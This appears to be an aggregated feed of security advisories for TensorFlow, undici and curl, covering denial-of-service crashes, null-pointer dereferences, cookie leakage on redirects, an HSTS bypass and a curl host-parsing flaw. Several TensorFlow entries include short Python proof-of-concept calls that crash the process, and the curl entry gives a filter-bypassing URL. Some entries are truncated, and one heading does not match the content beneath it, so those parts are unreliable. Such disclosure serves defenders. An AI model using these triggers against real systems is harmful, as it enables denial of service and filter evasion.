CVE-2022-29207: Release TensorFlow 2.6.4 · tensorflow/tensorflow

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, multiple TensorFlow operations misbehave in eager mode when the resource handle provided to them is invalid. In graph mode, it would have been impossible to perform these API calls, but migration to TF 2.x eager mode opened up this vulnerability. If the resource handle is empty, then a reference is bound to a null pointer inside TensorFlow codebase (various codepaths). This is undefined behavior. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

CVE-2022-31151

Authorization headers are cleared on cross-origin redirect. However, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There are active users using cookie headers in undici. This may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site. This was patched in v5.7.1. By default, this vulnerability is not exploitable. Do not enable redirections, i.e. `maxRedirections: 0` (the default).

If PSL support not provided, a more rudimentary check exists to atleast prevent cookies from being set on TLDs. This check was broken if thehost name in the URL uses a trailing dot. This can allow arbitrary sites to set cookies that then would get sent to adifferent and unrelated site or domain.

The curl URL parser wrongly accepts percent-encoded URL separators like '/'when decoding the host name part of a URL, making it a *different* URL usingthe wrong host name when it is later retrieved. For example, a URL like `http://example.com%2F127.0.0.1/`, would be allowed bythe parser and get transposed into `http://example.com/127.0.0.1/`. This flawcan be used to circumvent filters, checks and more.

CVE-2022-30115

Using its HSTS support, curl can be instructed to use HTTPS directly insteadof using an insecure clear-text HTTP step even when HTTP is provided in theURL. This mechanism could be bypassed if the host name in the given URL used atrailing dot while not using one when it built the HSTS cache. Or the otherway around - by having the trailing dot in the HSTS cache and *not* using thetrailing dot in the URL.

CVE-2022-27781

libcurl provides the `CURLOPT_CERTINFO` option to allow applications torequest details to be returned about a server's certificate chain.Due to an erroneous function, a malicious server could make libcurl built withNSS get stuck in a never-ending busy-loop when trying to retrieve thatinformation.

CVE-2022-27782

libcurl would reuse a previously created connection even when a TLS or SSHrelated option had been changed that should have prohibited reuse.libcurl keeps previously used connections in a connection pool for subsequenttransfers to reuse if one of them matches the setup. However, several TLS andSSH settings were left out from the configuration match checks, making themmatch too easily.

CVE-2022-22576

An improper authentication vulnerability exists in curl 7.33.0 to and including 7.82.0 which might allow reuse OAUTH2-authenticated connections without properly making sure that the connection was authenticated with the same credentials as set for this transfer. This affects SASL-enabled protocols: SMPTP(S), IMAP(S), POP3(S) and LDAP(S) (openldap only).

GHSA-8wwm-6264-x792: Core dump when loading TFLite models with quantization

### Impact Certain TFLite models that were created using TFLite model converter would crash when loaded in the TFLite interpreter. The culprit is that during quantization the scale of values could be greater than 1 but code was always assuming sub-unit scaling. Thus, since code was calling [`QuantizeMultiplierSmallerThanOneExp`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/lite/kernels/internal/quantization_util.cc#L114-L123), the `TFLITE_CHECK_LT` assertion would trigger and abort the process. ### Patches We have patched the issue in GitHub commit [a989426ee1346693cc015792f11d715f6944f2b8](https://github.com/tensorflow/tensorflow/commit/a989426ee1346693cc015792f11d715f6944f2b8). GHSA-5wpj-c6f7-24x8: Undefined behavior when users supply invalid resource handles

### Impact Multiple TensorFlow operations misbehave in eager mode when the resource handle provided to them is invalid: ```python import tensorflow as tf tf.raw_ops.QueueIsClosedV2(handle=[]) ``` ```python import tensorflow as tf tf.summary.flush(writer=()) ``` In graph mode, it would have been impossible to perform these API calls, but migration to TF 2.x eager mode opened up this vulnerability. GHSA-54ch-gjq5-4976: Segfault due to missing support for quantized types

### Impact There is a potential for segfault / denial of service in TensorFlow by calling `tf.compat.v1.*` ops which don't yet have support for quantized types (added after migration to TF 2.x): ```python import numpy as np import tensorflow as tf tf.compat.v1.placeholder_with_default(input=np.array([2]),shape=tf.constant(dtype=tf.qint8, value=np.array([1]))) ``` In these scenarios, since the kernel is missing, a [`nullptr` value is passed](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/eager/pywrap_tfe_src.cc#L480-L482) to [`ParseDimensionValue`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/eager/pywrap_tfe_src.cc#L296-L320) for the `py_value` argument. Then, this is dereferenced, resulting in segfault. ### Patches We have patched the issue in GitHub commit [237822b59fc504dda2c564787f5d3ad9c4aa62d9](https://github.com/tensorflow/tensorflow/commit/237822b59fc504dda2...

GHSA-hx9q-2mx4-m4pg: Missing validation causes denial of service via `Conv3DBackpropFilterV2`

This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf tf.strings.unsorted_segment_join( inputs=['123'], segment_ids=[0], num_segments=-1) ``` The code assumes `num_segments` is a positive scalar but there is no validation: ```cc const Tensor& num_segments_tensor = context->input(2); auto num_segments = num_segments_tensor.scalar<NUM_SEGMENTS_TYPE>()(); // ... Tensor* output_tensor = nullptr; TensorShape output_shape = GetOutputShape(input_shape, segment_id_shape, num_segments); ``` Since this value is used to allocate the output tensor, a negative value would result in a `CHECK`-failure (assertion failure), as per [TFSA-2021-198](https://github...

GHSA-jjm6-4vf7-cjh4: Integer overflow in `SpaceToBatchND`

### Impact The implementation of `tf.raw_ops.SpaceToBatchND` (in all backends such as XLA and handwritten kernels) is vulnerable to an integer overflow: ```python import tensorflow as tf input = tf.constant(-3.5e+35, shape=[10,19,22], dtype=tf.float32) block_shape = tf.constant(-1879048192, shape=[2], dtype=tf.int64) paddings = tf.constant(0, shape=[2,2], dtype=tf.int32) tf.raw_ops.SpaceToBatchND(input=input, block_shape=block_shape, paddings=paddings) ``` The result of this integer overflow is used to allocate the output tensor, hence we get a denial of service via a `CHECK`-failure (assertion failure), as in [TFSA-2021-198](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-198.md). ### Patches We have patched the issue in GitHub commit [acd56b8bcb72b163c834ae4f18469047b001fadf](https://github.com/tensorflow/tensorflow/commit/acd56b8bcb72b163c834ae4f18469047b001fadf). ### Impact The implementation of [`tf.raw_ops.QuantizeAndDequantizeV4Grad`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L148-L226) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=tf.constant(1, shape=[2,2], dtype=tf.float64), input=tf.constant(1, shape=[2,2], dtype=tf.float64), input_min=tf.constant([], shape=[0], dtype=tf.float64), input_max=tf.constant(-10, shape=[], dtype=tf.float64), axis=-1) ``` The code assumes `input_min` and `input_max` are scalars but there is no validation for this. ### Patches We have patched the issue in GitHub commit [098e7762d909bac47ce1dbabe6dfd06294cb9d58](https://github.com/tensorflow/tensorflow/commit/098e7762d909bac47ce1dbabe6dfd06294cb9d58). CVE-2022-29216: tensorflow/saved_model_cli.py at f3b9bf4c3c0597563b289c0512e98d4ce81f886e · tensorflow/tensorflow

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow's `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.

CVE-2022-29211: Prevent crash when histogram is called with NaN values. · tensorflow/tensorflow@e57fd69

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.histogram_fixed_width` is vulnerable to a crash when the values array contain `Not a Number` (`NaN`) elements. The implementation assumes that all floating point operations are defined and then converts a floating point result to an integer index. If `values` contains `NaN` then the result of the division is still `NaN` and the cast to `int32` would result in a crash. This only occurs on the CPU implementation. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

CVE-2022-29212: Core dumped when invoking TFLite model converted using latest nightly TFLite converter (2.4.0dev2020929) · Issue #43661 · tensorflow/tensorflow

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, certain TFLite models that were created using TFLite model converter would crash when loaded in the TFLite interpreter. The culprit is that during quantization the scale of values could be greater than 1 but code was always assuming sub-unit scaling. Thus, since code was calling `QuantizeMultiplierSmallerThanOneExp`, the `TFLITE_CHECK_LT` assertion would trigger and abort the process. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

CVE-2022-29213: `tf.compat.v1.signal.rfft2d` and `rfft3d` lacks input validation leading to crashes · Issue #55263 · tensorflow/tensorflow

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the `tf.compat.v1.signal.rfft2d` and `tf.compat.v1.signal.rfft3d` lack input validation and under certain condition can result in crashes (due to `CHECK`-failures). Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

CVE-2022-29209: tensorflow/logging.h at f3b9bf4c3c0597563b289c0512e98d4ce81f886e · tensorflow/tensorflow

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the macros that TensorFlow uses for writing assertions (e.g., `CHECK_LT`, `CHECK_GT`, etc.) have an incorrect logic when comparing `size_t` and `int` values. Due to type conversion rules, several of the macros would trigger incorrectly. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

CVE-2022-29202: Missing input validation on `tf.ragged.constant` · Issue #55199 · tensorflow/tensorflow

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.ragged.constant` does not fully validate the input arguments. This results in a denial of service by consuming all available memory. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

CVE-2022-29203

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.SpaceToBatchND` (in all backends such as XLA and handwritten kernels) is vulnerable to an integer overflow: The result of this integer overflow is used to allocate the output tensor, hence we get a denial of service via a `CHECK`-failure (assertion failure), as in TFSA-2021-198. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

CVE-2022-29204: Allow 0 for number of segments in `unsorted_segment_join_op.cc` · tensorflow/tensorflow@20cb187

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.UnsortedSegmentJoin` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `num_segments` is a positive scalar but there is no validation. Since this value is used to allocate the output tensor, a negative value would result in a `CHECK`-failure (assertion failure), as per TFSA-2021-198. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

CVE-2022-29205

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, there is a potential for segfault / denial of service in TensorFlow by calling `tf.compat.v1.*` ops which don't yet have support for quantized types, which was added after migration to TensorFlow 2.x. In these scenarios, since the kernel is missing, a `nullptr` value is passed to `ParseDimensionValue` for the `py_value` argument. Then, this is dereferenced, resulting in segfault. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

CVE-2022-29206

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.SparseTensorDenseAdd` does not fully validate the input arguments. In this case, a reference gets bound to a `nullptr` during kernel execution. This is undefined behavior. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

CVE-2022-29201: Fix undefined behavior in QuantizedConv2D · tensorflow/tensorflow@0f0b080
